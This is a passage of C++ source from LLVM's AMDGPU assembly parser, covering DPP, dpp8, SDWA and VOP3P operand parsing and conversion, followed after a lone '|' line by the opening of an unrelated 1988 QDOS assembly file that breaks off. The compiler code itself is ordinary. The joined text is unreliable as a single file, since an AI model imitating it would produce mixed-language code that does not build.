addOptionalImmOperand(Inst, Operands, OptIdx, AMDGPUOperand::ImmTyOpSelHi,
DefaultVal);
}
int NegLoIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::neg_lo);
if (NegLoIdx != -1) {
addOptionalImmOperand(Inst, Operands, OptIdx, AMDGPUOperand::ImmTyNegLo);
addOptionalImmOperand(Inst, Operands, OptIdx, AMDGPUOperand::ImmTyNegHi);
}
const int Ops[] = { AMDGPU::OpName::src0,
AMDGPU::OpName::src1,
AMDGPU::OpName::src2 };
const int ModOps[] = { AMDGPU::OpName::src0_modifiers,
AMDGPU::OpName::src1_modifiers,
AMDGPU::OpName::src2_modifiers };
unsigned OpSel = 0;
unsigned OpSelHi = 0;
unsigned NegLo = 0;
unsigned NegHi = 0;
if (OpSelIdx != -1)
OpSel = Inst.getOperand(OpSelIdx).getImm();
if (OpSelHiIdx != -1)
OpSelHi = Inst.getOperand(OpSelHiIdx).getImm();
if (NegLoIdx != -1) {
int NegHiIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::neg_hi);
NegLo = Inst.getOperand(NegLoIdx).getImm();
NegHi = Inst.getOperand(NegHiIdx).getImm();
}
// Fold bit J of each packed modifier into srcJ's modifiers operand.
for (int J = 0; J < 3; ++J) {
int OpIdx = AMDGPU::getNamedOperandIdx(Opc, Ops[J]);
if (OpIdx == -1)
break;
uint32_t ModVal = 0;
if ((OpSel & (1 << J)) != 0)
ModVal |= SISrcMods::OP_SEL_0;
if ((OpSelHi & (1 << J)) != 0)
ModVal |= SISrcMods::OP_SEL_1;
if ((NegLo & (1 << J)) != 0)
ModVal |= SISrcMods::NEG;
if ((NegHi & (1 << J)) != 0)
ModVal |= SISrcMods::NEG_HI;
int ModIdx = AMDGPU::getNamedOperandIdx(Opc, ModOps[J]);
Inst.getOperand(ModIdx).setImm(Inst.getOperand(ModIdx).getImm() | ModVal);
}
}
// Convenience overload: regular VOP3 conversion followed by the VOP3P
// packed-modifier fixup, sharing one optional-index map.
void AMDGPUAsmParser::cvtVOP3P(MCInst &Inst, const OperandVector &Operands) {
OptionalImmIndexMap OptIdx;
cvtVOP3(Inst, Operands, OptIdx);
cvtVOP3P(Inst, Operands, OptIdx);
}
//===----------------------------------------------------------------------===//
// dpp
//===----------------------------------------------------------------------===//
// True if this operand is a parsed dpp8 selector immediate.
bool AMDGPUOperand::isDPP8() const {
return isImmTy(ImmTyDPP8);
}
// True if this operand is a dpp_ctrl immediate whose 9-bit value falls in
// one of the defined DppCtrl encoding ranges.
bool AMDGPUOperand::isDPPCtrl() const {
using namespace AMDGPU::DPP;
bool result = isImm() && getImmTy() == ImmTyDppCtrl && isUInt<9>(getImm());
if (result) {
int64_t Imm = getImm();
return (Imm >= DppCtrl::QUAD_PERM_FIRST && Imm <= DppCtrl::QUAD_PERM_LAST) ||
(Imm >= DppCtrl::ROW_SHL_FIRST && Imm <= DppCtrl::ROW_SHL_LAST) ||
(Imm >= DppCtrl::ROW_SHR_FIRST && Imm <= DppCtrl::ROW_SHR_LAST) ||
(Imm >= DppCtrl::ROW_ROR_FIRST && Imm <= DppCtrl::ROW_ROR_LAST) ||
(Imm == DppCtrl::WAVE_SHL1) ||
(Imm == DppCtrl::WAVE_ROL1) ||
(Imm == DppCtrl::WAVE_SHR1) ||
(Imm == DppCtrl::WAVE_ROR1) ||
(Imm == DppCtrl::ROW_MIRROR) ||
(Imm == DppCtrl::ROW_HALF_MIRROR) ||
(Imm == DppCtrl::BCAST15) ||
(Imm == DppCtrl::BCAST31) ||
(Imm >= DppCtrl::ROW_SHARE_FIRST && Imm <= DppCtrl::ROW_SHARE_LAST) ||
(Imm >= DppCtrl::ROW_XMASK_FIRST && Imm <= DppCtrl::ROW_XMASK_LAST);
}
return false;
}
//===----------------------------------------------------------------------===//
// mAI
//===----------------------------------------------------------------------===//
// True if this operand is a 3-bit blgp immediate (MFMA modifier).
bool AMDGPUOperand::isBLGP() const {
return isImm() && getImmTy() == ImmTyBLGP && isUInt<3>(getImm());
}
// True if this operand is a 3-bit cbsz immediate (MFMA modifier).
bool AMDGPUOperand::isCBSZ() const {
return isImm() && getImmTy() == ImmTyCBSZ && isUInt<3>(getImm());
}
// True if this operand is a 4-bit abid immediate (MFMA modifier).
bool AMDGPUOperand::isABID() const {
return isImm() && getImmTy() == ImmTyABID && isUInt<4>(getImm());
}
// True if the immediate fits in 16 bits, signed or unsigned interpretation.
bool AMDGPUOperand::isS16Imm() const {
return isImm() && (isInt<16>(getImm()) || isUInt<16>(getImm()));
}
// True if the immediate fits in 16 unsigned bits.
bool AMDGPUOperand::isU16Imm() const {
return isImm() && isUInt<16>(getImm());
}
//===----------------------------------------------------------------------===//
// dim
//===----------------------------------------------------------------------===//
// Parse a MIMG dimension name (e.g. "1D", "2D_ARRAY", or the full
// "SQ_RSRC_IMG_*" form) into its hardware encoding. Returns false if the
// tokens do not form a known dimension.
bool AMDGPUAsmParser::parseDimId(unsigned &Encoding) {
// We want to allow "dim:1D" etc.,
// but the initial 1 is tokenized as an integer.
std::string Token;
if (isToken(AsmToken::Integer)) {
SMLoc Loc = getToken().getEndLoc();
Token = std::string(getTokenStr());
lex();
// Reject if the integer and the identifier are separated by whitespace.
if (getLoc() != Loc)
return false;
}
StringRef Suffix;
if (!parseId(Suffix))
return false;
Token += Suffix;
StringRef DimId = Token;
// Accept the long SQ_RSRC_IMG_ prefix by stripping it.
if (DimId.startswith("SQ_RSRC_IMG_"))
DimId = DimId.drop_front(12);
const AMDGPU::MIMGDimInfo *DimInfo = AMDGPU::getMIMGDimInfoByAsmSuffix(DimId);
if (!DimInfo)
return false;
Encoding = DimInfo->Encoding;
return true;
}
// Parse an optional "dim:<name>" operand (GFX10+ only) and push its
// encoding as an ImmTyDim operand.
OperandMatchResultTy AMDGPUAsmParser::parseDim(OperandVector &Operands) {
if (!isGFX10Plus())
return MatchOperand_NoMatch;
SMLoc S = getLoc();
if (!trySkipId("dim", AsmToken::Colon))
return MatchOperand_NoMatch;
unsigned Encoding;
SMLoc Loc = getLoc();
if (!parseDimId(Encoding)) {
Error(Loc, "invalid dim value");
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Encoding, S,
AMDGPUOperand::ImmTyDim));
return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// dpp
//===----------------------------------------------------------------------===//
// Parse a "dpp8:[s0,...,s7]" selector list (GFX10+). Each lane selector is
// a 3-bit value; the eight selectors are packed into one 24-bit immediate.
OperandMatchResultTy AMDGPUAsmParser::parseDPP8(OperandVector &Operands) {
SMLoc S = getLoc();
if (!isGFX10Plus() || !trySkipId("dpp8", AsmToken::Colon))
return MatchOperand_NoMatch;
// dpp8:[%d,%d,%d,%d,%d,%d,%d,%d]
int64_t Sels[8];
if (!skipToken(AsmToken::LBrac, "expected an opening square bracket"))
return MatchOperand_ParseFail;
for (size_t i = 0; i < 8; ++i) {
if (i > 0 && !skipToken(AsmToken::Comma, "expected a comma"))
return MatchOperand_ParseFail;
SMLoc Loc = getLoc();
if (getParser().parseAbsoluteExpression(Sels[i]))
return MatchOperand_ParseFail;
if (0 > Sels[i] || 7 < Sels[i]) {
Error(Loc, "expected a 3-bit value");
return MatchOperand_ParseFail;
}
}
if (!skipToken(AsmToken::RBrac, "expected a closing square bracket"))
return MatchOperand_ParseFail;
// Pack selector i into bits [3i+2 : 3i].
unsigned DPP8 = 0;
for (size_t i = 0; i < 8; ++i)
DPP8 |= (Sels[i] << (i * 3));
Operands.push_back(AMDGPUOperand::CreateImm(this, DPP8, S, AMDGPUOperand::ImmTyDPP8));
return MatchOperand_Success;
}
// Report whether the named dpp_ctrl variant is available on the current
// subtarget. Subtarget-restricted controls are checked first; the generic
// controls at the bottom exist on every dpp-capable target.
bool
AMDGPUAsmParser::isSupportedDPPCtrl(StringRef Ctrl,
                                    const OperandVector &Operands) {
  if (Ctrl == "row_newbcast")
    return isGFX90A();
  const bool IsGfx10OnlyCtrl = (Ctrl == "row_share") || (Ctrl == "row_xmask");
  if (IsGfx10OnlyCtrl)
    return isGFX10Plus();
  const bool IsGfx8Gfx9Ctrl = (Ctrl == "wave_shl") || (Ctrl == "wave_shr") ||
                              (Ctrl == "wave_rol") || (Ctrl == "wave_ror") ||
                              (Ctrl == "row_bcast");
  if (IsGfx8Gfx9Ctrl)
    return isVI() || isGFX9();
  return Ctrl == "row_mirror" || Ctrl == "row_half_mirror" ||
         Ctrl == "quad_perm" || Ctrl == "row_shl" || Ctrl == "row_shr" ||
         Ctrl == "row_ror";
}
// Parse the "[a,b,c,d]" list of a quad_perm dpp control. Each element is a
// 2-bit lane selector; the four are packed into an 8-bit value. Returns -1
// on any parse error (after reporting it).
int64_t
AMDGPUAsmParser::parseDPPCtrlPerm() {
// quad_perm:[%d,%d,%d,%d]
if (!skipToken(AsmToken::LBrac, "expected an opening square bracket"))
return -1;
int64_t Val = 0;
for (int i = 0; i < 4; ++i) {
if (i > 0 && !skipToken(AsmToken::Comma, "expected a comma"))
return -1;
int64_t Temp;
SMLoc Loc = getLoc();
if (getParser().parseAbsoluteExpression(Temp))
return -1;
if (Temp < 0 || Temp > 3) {
Error(Loc, "expected a 2-bit value");
return -1;
}
// Element i occupies bits [2i+1 : 2i].
Val += (Temp << i * 2);
}
if (!skipToken(AsmToken::RBrac, "expected a closing square bracket"))
return -1;
return Val;
}
// Parse the numeric argument of a value-taking dpp control ("row_shl:3"
// etc.), validate it against the control's allowed range, and combine it
// with the control's base encoding. Returns -1 on error (after reporting).
int64_t
AMDGPUAsmParser::parseDPPCtrlSel(StringRef Ctrl) {
using namespace AMDGPU::DPP;
// sel:%d
int64_t Val;
SMLoc Loc = getLoc();
if (getParser().parseAbsoluteExpression(Val))
return -1;
// Base encoding plus inclusive [Lo, Hi] range for the argument.
struct DppCtrlCheck {
int64_t Ctrl;
int Lo;
int Hi;
};
DppCtrlCheck Check = StringSwitch<DppCtrlCheck>(Ctrl)
.Case("wave_shl", {DppCtrl::WAVE_SHL1, 1, 1})
.Case("wave_rol", {DppCtrl::WAVE_ROL1, 1, 1})
.Case("wave_shr", {DppCtrl::WAVE_SHR1, 1, 1})
.Case("wave_ror", {DppCtrl::WAVE_ROR1, 1, 1})
.Case("row_shl", {DppCtrl::ROW_SHL0, 1, 15})
.Case("row_shr", {DppCtrl::ROW_SHR0, 1, 15})
.Case("row_ror", {DppCtrl::ROW_ROR0, 1, 15})
.Case("row_share", {DppCtrl::ROW_SHARE_FIRST, 0, 15})
.Case("row_xmask", {DppCtrl::ROW_XMASK_FIRST, 0, 15})
.Case("row_newbcast", {DppCtrl::ROW_NEWBCAST_FIRST, 0, 15})
.Default({-1, 0, 0});
bool Valid;
if (Check.Ctrl == -1) {
// Not in the table: only row_bcast:15 / row_bcast:31 remain.
Valid = (Ctrl == "row_bcast" && (Val == 15 || Val == 31));
Val = (Val == 15)? DppCtrl::BCAST15 : DppCtrl::BCAST31;
} else {
Valid = Check.Lo <= Val && Val <= Check.Hi;
// Single-valued controls encode as the base alone; ranged ones OR in Val.
Val = (Check.Lo == Check.Hi) ? Check.Ctrl : (Check.Ctrl | Val);
}
if (!Valid) {
Error(Loc, Twine("invalid ", Ctrl) + Twine(" value"));
return -1;
}
return Val;
}
// Parse a dpp_ctrl operand: either a bare keyword (row_mirror,
// row_half_mirror) or a "name:value(s)" form handled by the perm/sel
// helpers. Pushes the resulting ImmTyDppCtrl encoding on success.
OperandMatchResultTy
AMDGPUAsmParser::parseDPPCtrl(OperandVector &Operands) {
using namespace AMDGPU::DPP;
if (!isToken(AsmToken::Identifier) ||
!isSupportedDPPCtrl(getTokenStr(), Operands))
return MatchOperand_NoMatch;
SMLoc S = getLoc();
int64_t Val = -1;
StringRef Ctrl;
parseId(Ctrl);
if (Ctrl == "row_mirror") {
Val = DppCtrl::ROW_MIRROR;
} else if (Ctrl == "row_half_mirror") {
Val = DppCtrl::ROW_HALF_MIRROR;
} else {
if (skipToken(AsmToken::Colon, "expected a colon")) {
if (Ctrl == "quad_perm") {
Val = parseDPPCtrlPerm();
} else {
Val = parseDPPCtrlSel(Ctrl);
}
}
}
// Helpers return -1 on failure and have already emitted the diagnostic.
if (Val == -1)
return MatchOperand_ParseFail;
Operands.push_back(
AMDGPUOperand::CreateImm(this, Val, S, AMDGPUOperand::ImmTyDppCtrl));
return MatchOperand_Success;
}
// Default row_mask for dpp: 0xf (all rows enabled).
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultRowMask() const {
return AMDGPUOperand::CreateImm(this, 0xf, SMLoc(), AMDGPUOperand::ImmTyDppRowMask);
}
// Default immediate (0) for an omitted s_endpgm argument.
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultEndpgmImmOperands() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyEndpgm);
}
// Default bank_mask for dpp: 0xf (all banks enabled).
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultBankMask() const {
return AMDGPUOperand::CreateImm(this, 0xf, SMLoc(), AMDGPUOperand::ImmTyDppBankMask);
}
// Default bound_ctrl for dpp: 0.
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultBoundCtrl() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyDppBoundCtrl);
}
// Default fi (fetch-invalid) for dpp: 0.
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultFI() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyDppFi);
}
// Convert parsed DPP (and dpp8) operands into MCInst operands. Handles
// tied operands (MAC src2/old) by duplicating the tied-to operand, skips
// the textual "vcc" of VOP2b forms, and appends the dpp control immediates
// (row/bank mask, bound_ctrl, fi) or the packed dpp8 selector + fi.
void AMDGPUAsmParser::cvtDPP(MCInst &Inst, const OperandVector &Operands, bool IsDPP8) {
OptionalImmIndexMap OptionalIdx;
unsigned Opc = Inst.getOpcode();
bool HasModifiers =
AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0_modifiers) != -1;
unsigned I = 1;
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
}
int Fi = 0;
for (unsigned E = Operands.size(); I != E; ++I) {
auto TiedTo = Desc.getOperandConstraint(Inst.getNumOperands(),
MCOI::TIED_TO);
if (TiedTo != -1) {
assert((unsigned)TiedTo < Inst.getNumOperands());
// handle tied old or src2 for MAC instructions
Inst.addOperand(Inst.getOperand(TiedTo));
}
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
// Add the register arguments
if (Op.isReg() && validateVccOperand(Op.getReg())) {
// VOP2b (v_add_u32, v_sub_u32 ...) dpp use "vcc" token.
// Skip it.
continue;
}
if (IsDPP8) {
if (Op.isDPP8()) {
Op.addImmOperands(Inst, 1);
} else if (HasModifiers &&
isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegWithFPInputModsOperands(Inst, 2);
} else if (Op.isFI()) {
// fi is emitted last for dpp8; remember its value for now.
Fi = Op.getImm();
} else if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
} else {
llvm_unreachable("Invalid operand type");
}
} else {
if (HasModifiers &&
isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegWithFPInputModsOperands(Inst, 2);
} else if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
} else if (Op.isDPPCtrl()) {
Op.addImmOperands(Inst, 1);
} else if (Op.isImm()) {
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = I;
} else {
llvm_unreachable("Invalid operand type");
}
}
}
if (IsDPP8) {
using namespace llvm::AMDGPU::DPP;
Inst.addOperand(MCOperand::createImm(Fi? DPP8_FI_1 : DPP8_FI_0));
} else {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDppRowMask, 0xf);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDppBankMask, 0xf);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDppBoundCtrl);
if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::fi) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDppFi);
}
}
}
//===----------------------------------------------------------------------===//
// sdwa
//===----------------------------------------------------------------------===//
// Parse an SDWA select operand ("<Prefix>:BYTE_n"/"WORD_n"/"DWORD") and
// push it as an immediate of the given type. Emits a diagnostic and fails
// on an unrecognized selector name.
OperandMatchResultTy
AMDGPUAsmParser::parseSDWASel(OperandVector &Operands, StringRef Prefix,
AMDGPUOperand::ImmTy Type) {
using namespace llvm::AMDGPU::SDWA;
SMLoc S = getLoc();
StringRef Value;
OperandMatchResultTy res;
SMLoc StringLoc;
res = parseStringWithPrefix(Prefix, Value, StringLoc);
if (res != MatchOperand_Success) {
return res;
}
int64_t Int;
Int = StringSwitch<int64_t>(Value)
.Case("BYTE_0", SdwaSel::BYTE_0)
.Case("BYTE_1", SdwaSel::BYTE_1)
.Case("BYTE_2", SdwaSel::BYTE_2)
.Case("BYTE_3", SdwaSel::BYTE_3)
.Case("WORD_0", SdwaSel::WORD_0)
.Case("WORD_1", SdwaSel::WORD_1)
.Case("DWORD", SdwaSel::DWORD)
.Default(0xffffffff);
// 0xffffffff marks "no match" (all real selector values are small).
if (Int == 0xffffffff) {
Error(StringLoc, "invalid " + Twine(Prefix) + " value");
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Int, S, Type));
return MatchOperand_Success;
}
// Parse an SDWA "dst_unused:UNUSED_*" operand and push it as an
// ImmTySdwaDstUnused immediate. Emits a diagnostic and fails on an
// unrecognized value.
OperandMatchResultTy
AMDGPUAsmParser::parseSDWADstUnused(OperandVector &Operands) {
using namespace llvm::AMDGPU::SDWA;
SMLoc S = getLoc();
StringRef Value;
OperandMatchResultTy res;
SMLoc StringLoc;
res = parseStringWithPrefix("dst_unused", Value, StringLoc);
if (res != MatchOperand_Success) {
return res;
}
int64_t Int;
Int = StringSwitch<int64_t>(Value)
.Case("UNUSED_PAD", DstUnused::UNUSED_PAD)
.Case("UNUSED_SEXT", DstUnused::UNUSED_SEXT)
.Case("UNUSED_PRESERVE", DstUnused::UNUSED_PRESERVE)
.Default(0xffffffff);
// 0xffffffff marks "no match" (all real values are small).
if (Int == 0xffffffff) {
Error(StringLoc, "invalid dst_unused value");
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Int, S, AMDGPUOperand::ImmTySdwaDstUnused));
return MatchOperand_Success;
}
// SDWA conversion entry point for VOP1 instructions.
void AMDGPUAsmParser::cvtSdwaVOP1(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOP1);
}
// SDWA conversion entry point for VOP2 instructions.
void AMDGPUAsmParser::cvtSdwaVOP2(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOP2);
}
// SDWA conversion for VOP2b: skip both the dst and src "vcc" tokens.
void AMDGPUAsmParser::cvtSdwaVOP2b(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOP2, true, true);
}
// SDWA conversion for VOP2e: skip only the src "vcc" token.
void AMDGPUAsmParser::cvtSdwaVOP2e(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOP2, false, true);
}
// SDWA conversion for VOPC: the dst "vcc" token is skipped on VI only.
void AMDGPUAsmParser::cvtSdwaVOPC(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOPC, isVI());
}
// Common conversion of parsed SDWA operands into an MCInst.
//
// BasicInstType selects VOP1/VOP2/VOPC handling. SkipDstVcc/SkipSrcVcc
// request dropping one explicit "vcc" token that is encoded implicitly in
// the instruction rather than as an MCInst operand.
void AMDGPUAsmParser::cvtSDWA(MCInst &Inst, const OperandVector &Operands,
                              uint64_t BasicInstType,
                              bool SkipDstVcc,
                              bool SkipSrcVcc) {
  using namespace llvm::AMDGPU::SDWA;

  OptionalImmIndexMap OptionalIdx;
  bool SkipVcc = SkipDstVcc || SkipSrcVcc;
  bool SkippedVcc = false;

  // Operands[0] is the mnemonic; mandatory register defs follow it.
  unsigned I = 1;
  const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
  for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
    ((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
  }

  for (unsigned E = Operands.size(); I != E; ++I) {
    AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
    if (SkipVcc && !SkippedVcc && Op.isReg() &&
        (Op.getReg() == AMDGPU::VCC || Op.getReg() == AMDGPU::VCC_LO)) {
      // VOP2b (v_add_u32, v_sub_u32 ...) sdwa use "vcc" token as dst.
      // Skip it if it's 2nd (e.g. v_add_i32_sdwa v1, vcc, v2, v3)
      // or 4th (v_addc_u32_sdwa v1, vcc, v2, v3, vcc) operand.
      // Skip VCC only if we didn't skip it on previous iteration.
      // Note that src0 and src1 occupy 2 slots each because of modifiers.
      if (BasicInstType == SIInstrFlags::VOP2 &&
          ((SkipDstVcc && Inst.getNumOperands() == 1) ||
           (SkipSrcVcc && Inst.getNumOperands() == 5))) {
        SkippedVcc = true;
        continue;
      } else if (BasicInstType == SIInstrFlags::VOPC &&
                 Inst.getNumOperands() == 0) {
        SkippedVcc = true;
        continue;
      }
    }
    if (isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
      // Source with modifiers: contributes two MCInst operands.
      Op.addRegOrImmWithInputModsOperands(Inst, 2);
    } else if (Op.isImm()) {
      // Handle optional arguments
      OptionalIdx[Op.getImmTy()] = I;
    } else {
      llvm_unreachable("Invalid operand type");
    }
    SkippedVcc = false;
  }

  // Append defaults for any optional SDWA operands the assembly text omitted.
  if (Inst.getOpcode() != AMDGPU::V_NOP_sdwa_gfx10 &&
      Inst.getOpcode() != AMDGPU::V_NOP_sdwa_gfx9 &&
      Inst.getOpcode() != AMDGPU::V_NOP_sdwa_vi) {
    // v_nop_sdwa_vi/gfx9/gfx10 has no optional sdwa arguments
    switch (BasicInstType) {
    case SIInstrFlags::VOP1:
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI, 0);
      if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::omod) != -1) {
        addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOModSI, 0);
      }
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaDstSel, SdwaSel::DWORD);
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaDstUnused, DstUnused::UNUSED_PRESERVE);
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc0Sel, SdwaSel::DWORD);
      break;

    case SIInstrFlags::VOP2:
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI, 0);
      if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::omod) != -1) {
        addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOModSI, 0);
      }
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaDstSel, SdwaSel::DWORD);
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaDstUnused, DstUnused::UNUSED_PRESERVE);
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc0Sel, SdwaSel::DWORD);
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc1Sel, SdwaSel::DWORD);
      break;

    case SIInstrFlags::VOPC:
      // clamp is not present on all VOPC sdwa opcodes.
      if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::clamp) != -1)
        addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI, 0);
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc0Sel, SdwaSel::DWORD);
      addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc1Sel, SdwaSel::DWORD);
      break;

    default:
      llvm_unreachable("Invalid instruction type. Only VOP1, VOP2 and VOPC allowed");
    }
  }

  // special case v_mac_{f16, f32}:
  // it has src2 register operand that is tied to dst operand
  if (Inst.getOpcode() == AMDGPU::V_MAC_F32_sdwa_vi ||
      Inst.getOpcode() == AMDGPU::V_MAC_F16_sdwa_vi) {
    auto it = Inst.begin();
    std::advance(
      it, AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::src2));
    Inst.insert(it, Inst.getOperand(0)); // src2 = dst
  }
}
//===----------------------------------------------------------------------===//
// mAI
//===----------------------------------------------------------------------===//
// Default (0) immediate operands for MAI instruction modifiers that were not
// written explicitly in the assembly text: blgp, cbsz and abid.
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultBLGP() const {
  return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyBLGP);
}

AMDGPUOperand::Ptr AMDGPUAsmParser::defaultCBSZ() const {
  return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyCBSZ);
}

AMDGPUOperand::Ptr AMDGPUAsmParser::defaultABID() const {
  return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyABID);
}
/// Force static initialization.
/// Registers this parser for both the R600 and GCN targets so that
/// createMCAsmParser can find it.
extern "C" LLVM_EXTERNAL_VISIBILITY void LLVMInitializeAMDGPUAsmParser() {
  RegisterMCAsmParser<AMDGPUAsmParser> A(getTheAMDGPUTarget());
  RegisterMCAsmParser<AMDGPUAsmParser> B(getTheGCNTarget());
}
#define GET_REGISTER_MATCHER
#define GET_MATCHER_IMPLEMENTATION
#define GET_MNEMONIC_SPELL_CHECKER
#define GET_MNEMONIC_CHECKER
#include "AMDGPUGenAsmMatcher.inc"
// This function should be defined after auto-generated include so that we have
// MatchClassKind enum defined
// Custom operand-class validation hook called by the generated matcher.
// Returns Match_Success when Op can serve as the given MatchClassKind,
// Match_InvalidOperand otherwise.
unsigned AMDGPUAsmParser::validateTargetOperandClass(MCParsedAsmOperand &Op,
                                                     unsigned Kind) {
  // Tokens like "glc" would be parsed as immediate operands in ParseOperand().
  // But MatchInstructionImpl() expects to meet token and fails to validate
  // operand. This method checks if we are given immediate operand but expect to
  // get corresponding token.
  AMDGPUOperand &Operand = (AMDGPUOperand&)Op;
  switch (Kind) {
  case MCK_addr64:
    return Operand.isAddr64() ? Match_Success : Match_InvalidOperand;
  case MCK_gds:
    return Operand.isGDS() ? Match_Success : Match_InvalidOperand;
  case MCK_lds:
    return Operand.isLDS() ? Match_Success : Match_InvalidOperand;
  case MCK_idxen:
    return Operand.isIdxen() ? Match_Success : Match_InvalidOperand;
  case MCK_offen:
    return Operand.isOffen() ? Match_Success : Match_InvalidOperand;
  case MCK_SSrcB32:
    // When operands have expression values, they will return true for isToken,
    // because it is not possible to distinguish between a token and an
    // expression at parse time. MatchInstructionImpl() will always try to
    // match an operand as a token, when isToken returns true, and when the
    // name of the expression is not a valid token, the match will fail,
    // so we need to handle it here.
    return Operand.isSSrcB32() ? Match_Success : Match_InvalidOperand;
  case MCK_SSrcF32:
    return Operand.isSSrcF32() ? Match_Success : Match_InvalidOperand;
  case MCK_SoppBrTarget:
    return Operand.isSoppBrTarget() ? Match_Success : Match_InvalidOperand;
  case MCK_VReg32OrOff:
    return Operand.isVReg32OrOff() ? Match_Success : Match_InvalidOperand;
  case MCK_InterpSlot:
    return Operand.isInterpSlot() ? Match_Success : Match_InvalidOperand;
  case MCK_Attr:
    return Operand.isInterpAttr() ? Match_Success : Match_InvalidOperand;
  case MCK_AttrChan:
    return Operand.isAttrChan() ? Match_Success : Match_InvalidOperand;
  case MCK_ImmSMEMOffset:
    return Operand.isSMEMOffset() ? Match_Success : Match_InvalidOperand;
  case MCK_SReg_64:
  case MCK_SReg_64_XEXEC:
    // Null is defined as a 32-bit register but
    // it should also be enabled with 64-bit operands.
    // The following code enables it for SReg_64 operands
    // used as source and destination. Remaining source
    // operands are handled in isInlinableImm.
    return Operand.isNull() ? Match_Success : Match_InvalidOperand;
  default:
    return Match_InvalidOperand;
  }
}
//===----------------------------------------------------------------------===//
// endpgm
//===----------------------------------------------------------------------===//
// Parses the optional immediate operand of s_endpgm.
// Accepts a 16-bit value; when the operand is absent it defaults to 0.
OperandMatchResultTy AMDGPUAsmParser::parseEndpgmOp(OperandVector &Operands) {
  SMLoc S = getLoc();
  int64_t Imm = 0;
  if (!parseExpr(Imm)) {
    // The operand is optional, if not present default to 0
    Imm = 0;
  }
  if (!isUInt<16>(Imm)) {
    Error(S, "expected a 16-bit value");
    return MatchOperand_ParseFail;
  }
  Operands.push_back(
      AMDGPUOperand::CreateImm(this, Imm, S, AMDGPUOperand::ImmTyEndpgm));
  return MatchOperand_Success;
}
bool AMDGPUOperand::isEndpgm() const { return isImmTy(ImmTyEndpgm); }
|
; General IO utility: fetch byte with cursor V2.00 1988 Tony Tebby
section gen_util
xdef gu_fbcur
xref gu_iow
include 'dev8_keys_qdos_io'
;+++
; This routine does fetch byte with cursor enabled
;
